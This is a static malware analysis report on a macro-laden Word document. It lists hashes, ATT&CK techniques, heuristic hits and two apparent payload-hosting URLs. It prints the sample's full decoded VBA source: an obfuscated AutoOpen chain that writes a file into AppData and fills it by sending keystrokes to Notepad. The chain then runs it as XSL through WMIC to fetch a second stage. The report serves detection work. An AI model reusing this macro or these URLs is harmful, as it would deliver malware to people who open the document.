Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca381193229b5474…

MALICIOUS

Office (OLE)

Size: 499.5 KB
Created: 2020-06-16 08:32:00
Authoring application: Microsoft Office Word
First seen: 2020-07-24
MD5: 87aa7eb639985563f641d3487666f754
SHA-1: cede238e250945721cfd93b542490a3b7dd306e6
SHA-256: ca381193229b547475e5724d5ea9f202b92f72836e9ada71ebad288845de2bbf
Risk score: 238

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains VBA macros that leverage WScript.Shell and CreateObject to execute commands. The autoopen macro attempts to delete an inline shape and then calls a subroutine that uses 'scripting.filesystemobject' and 'wscript.shell'. This indicates the macro is designed to download and execute a second-stage payload from the URLs provided. The embedded JavaScript also contains references to these URLs and uses a delay function, suggesting it's part of the same malicious chain.

Heuristics (9)

  • VBA macros detected (severity: medium; 5 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • WScript.Shell usage (severity: critical) [OLE_VBA_WSCRIPT]
    Matched lines in script:
    Dim on_her_composure As String
    on_her_composure = "wscript.shell"
  • CreateObject call (severity: high) [OLE_VBA_CREATEOBJ]
    Matched lines in script:
    Dim with_you_mr As String
    Set charles_gets_to = CreateObject(from_her_heart)
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low) [OLE_VBA_AUTOOPEN]
    Matched line in script:
    Sub autoopen()
  • Environ() call (env variable access) (severity: low) [OLE_VBA_ENVIRON]
    Matched lines in script:
    arose_to_come = Environ(portrait_undoubtedly_see)
    you_heard_her = arose_to_come & pride_and_look & but_well_is & through_with
  • Reference to Windows Script Host (severity: high) [SC_STR_WSCRIPT]
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://batriaruum.com/dasruol.dll (in document text, OLE body)
    • https://penotorc.com/topwin.dll (in document text, OLE body)
    • http://www.w3.org/1999/XSL/Transform (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8644 bytes
SHA-256: 53e0184e5a8edc70d4106f1625e527163b9acf74d875e0fd0c6992da9c572619

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub autoopen()

Dim though_the_day As String
though_the_day = "00:00:01"


ActiveDocument.InlineShapes(1).Delete


ActiveDocument.InlineShapes(1).ScaleHeight = 64

ActiveDocument.InlineShapes(1).ScaleWidth = 76


refuge_in = Now() + TimeValue(though_the_day)


While Now() < refuge_in


 Debug.Print Now()

 Wend


Dim charles_gets_to As Object


Dim from_her_heart As String
from_her_heart = "scripting.filesystemobject"

'to their marriage may
Dim with_you_mr As String
Set charles_gets_to = CreateObject(from_her_heart)


Call she_still_greater(charles_gets_to)

them_to_his
dear_sir_william

such_an_ensigncy

End Sub

Attribute VB_Name = "more_interesting_mode"
Sub them_to_his()
wonder_if_it
End Sub

Attribute VB_Name = "they_bent"
Sub wonder_if_it()
on_the_charge
End Sub

Attribute VB_Name = "out_its_acceptance"
Sub on_the_charge()
elizabeth_was_repeated
End Sub

Attribute VB_Name = "they_no_means"
Sub elizabeth_was_repeated()
the_parlour_and
End Sub

Attribute VB_Name = "so_pleasing"
Sub the_parlour_and()
advantage_bingley
End Sub

Attribute VB_Name = "for_that_bingley"



'of mr bingley tired of

Option Explicit


Public arose_to_come As String


Public you_heard_her As String

Sub she_still_greater(little_something)



Dim on_her_composure As String
on_her_composure = "wscript.shell"

Dim but_well_is As String



Dim pride_and_look As String
pride_and_look = "\"



Dim your_fancy As Long


Dim less_of_discourse As Variant


Dim through_with As String
through_with = ".txt"


'expressions in vain indeed it


Dim raising_expectations As Variant


Dim contempt_of_receiving As String
contempt_of_receiving = "by_the_mistake"


Dim the_assembly_the As String
the_assembly_the = "with_all_grateful"


Dim rooted_dislike_of As String
rooted_dislike_of = "long_expectations_which"


Dim it_in_her As String
it_in_her = "may_befall"


Dim and_ill_that As String
and_ill_that = "partiality_had_better"


Dim that_considering_his As String
that_considering_his = "as_much_earnest"



raising_expectations = Array(contempt_of_receiving, the_assembly_the, rooted_dislike_of, it_in_her, and_ill_that, that_considering_his)
 less_of_discourse = Array(1)
For your_fancy = 1 To less_of_discourse(Int((UBound(less_of_discourse) - LBound(less_of_discourse) + 1) * Rnd + LBound(less_of_discourse)))
    but_well_is = but_well_is & raising_expectations(Int((UBound(raising_expectations) - LBound(raising_expectations) + 1) * Rnd + LBound(raising_expectations)))


    Next your_fancy

'but a regret she


Dim portrait_undoubtedly_see As String
portrait_undoubtedly_see = "appdata"

arose_to_come = Environ(portrait_undoubtedly_see)
you_heard_her = arose_to_come & pride_and_look & but_well_is & through_with
Dim to_the_visit As Object
Set to_the_visit = little_something.CreateTextFile(you_heard_her, True, True)

to_the_visit.Close

End Sub

Attribute VB_Name = "secured_when_questioned"
Sub dear_sir_william()
that_man_cannot
End Sub

Attribute VB_Name = "to_you_wish"
Sub that_man_cannot()
in_an_expression
End Sub

Attribute VB_Name = "walk_of_the"
Sub in_an_expression()
sum_that_does
End Sub

Attribute VB_Name = "their_sudden_and"
Sub sum_that_does()
mr_collins_she
End Sub

Attribute VB_Name = "an_hour_she"



Sub advantage_bingley()



Dim exclaiming_this_as As String
exclaiming_this_as = "wscript.shell"


Dim though_he_could As String
though_he_could = "notepad "


appear_perfectly = though_he_could & Chr(34) & you_heard_her & Chr(34)

On Error Resume Next: Wscript.Quit = ("" & CreateObject(((exclaiming_this_as))).Run((though_he_could & you_heard_her), (0), (0)))

End Sub

Attribute VB_Name = "feel_on_her"
Sub such_an_ensigncy()
you_i_understand
End Sub

Attribute VB_Name = "of_civility"
Sub you_i_understand()
either_side_elizabeth
End Sub

Attribute VB_Name = "the_room_that"
Sub either_side_elizabeth()
it_too_with
End Sub

Attribute VB_Name = "pride_pride_yes"



Public Declare PtrSafe Function and_it_on Lib "user32.dll" Alias "PostMessageA" (ByVal in_a_soul As Long, ByVal nor_when_darcy As Long, ByVal with_the_defects As Long, ByVal elizabeth_i_had As Long) As Long
Public Const as_well_lizzy As Long = &H3
Public Const expressions_elizabeth_related As Long = &H102

Public Const and_was_wishing As Long = &H111


Public Const was_pronounced As Long = &H112


Public Declare PtrSafe Function only_been_complete Lib "user32.dll" Alias "FindWindowExA" (ByVal or_relating As Long, ByVal i_have_got As Long, ByVal in_his_younger As String, ByVal and_she_always As String) As Long


Public Const but_hurrying As Long = &H10
Public Const then_to_such As Long = &H46
Sub mr_collins_she()


Dim kitty_though_every As String
kitty_though_every = "00:00:03"


Dim their_first_meeting As String
their_first_meeting = "notepad"



lively_attention_and = Now() + TimeValue(kitty_though_every)


While Now() < lively_attention_and


 Debug.Print Now()
 Wend


If Len(you_heard_her) > 0 Then
Dim so_severe_on As Paragraph

Dim the_parents As Object


Dim too_pleasantly_but As String

Dim moreover_she As String
moreover_she = "edit"


Dim to_the_better As String



Dim young_ladies_by As String
young_ladies_by = "<"


most_painful_regrets = Now() + TimeValue(kitty_though_every)

While Now() < most_painful_regrets

 Debug.Print Now()

 Wend
so_alarming = only_been_complete(0, 0, their_first_meeting, vbNullString)
with_wickham_himself = only_been_complete(so_alarming, 0, moreover_she, vbNullString)
For Each so_severe_on In ActiveDocument.Paragraphs
to_the_better = so_severe_on.Range.Text
If InStr(1, to_the_better, young_ladies_by) = 1 Then


Dim or_rapidity_of As String
or_rapidity_of = Replace(to_the_better, young_ladies_by, "", 1, 1)
For on_that_the = 1 To Len(or_rapidity_of)
For the_smallest_intention = 1 To 1295

were_still_more = Asc(Mid(or_rapidity_of, on_that_the, 1))
Next the_smallest_intention
and_it_on with_wickham_himself, expressions_elizabeth_related, were_still_more, 0

Next on_that_the


End If
Next so_severe_on


End If

and_it_on so_alarming, and_was_wishing, as_well_lizzy, then_to_such


lively_attention_and = Now() + TimeValue(kitty_though_every)


While Now() < lively_attention_and
 Debug.Print Now()
 Wend
and_it_on so_alarming, but_hurrying, 0, 0


End Sub

Attribute VB_Name = "resemblance_to_laughter"

Attribute VB_Name = "themselves_the_luckless"

Attribute VB_Name = "to_go_alone"

Attribute VB_Name = "the_names_facts"

Attribute VB_Name = "such_a_fortnight"

Attribute VB_Name = "occasions_and_burying"

Attribute VB_Name = "though_you"

Attribute VB_Name = "in_the_entrance"


Sub it_too_with()



Dim in_your_picture As String
in_your_picture = "WmIC"


Dim a_great_danger As String
a_great_danger = ".txt"


Dim and_might_be As String
and_might_be = ".xsl"


Dim the_world_in As String
the_world_in = "consolewindowclass"


Dim that_this_civil As String
that_this_civil = "process list /format:"


Dim having_concealed As String
having_concealed = "00:00:01"




Dim happy_prospect_of As String
happy_prospect_of = "wscript.shell"


Dim well_avoid As String
well_avoid = """"



On Error Resume Next: Wscript.Quit = ("" & CreateObject(((happy_prospect_of))).Run((in_your_picture), (0), (0)))


newn = Replace(you_heard_her, a_great_danger, and_might_be)

Name you_heard_her As newn
or_two_sixth = Now() + TimeValue(having_concealed)
While Now() < or_two_sixth

 Wend


to_make_both = that_this_civil & well_avoid & newn & well_avoid

For never_to_dine = 1 To Len(to_make_both)
For but_luckily_he = 1 To 1059415

the_means_or = Asc(Left$(Mid$(to_make_both, never_to_dine), 1))

Next but_luckily_he


civilities_were_separating = only_been_complete(0, 0, the_world_in, vbNullString)


On Error Resume Next: Wscript.Quit = ("" & and_it_on((civilities_were_separating), (expressions_elizabeth_related), (the_means_or), (0)))
Next never_to_dine


On Error Resume Next: Wscript.Quit = ("" & and_it_on((civilities_were_separating), (expressions_elizabeth_related), (Asc(vbNewLine)), (0)))

End Sub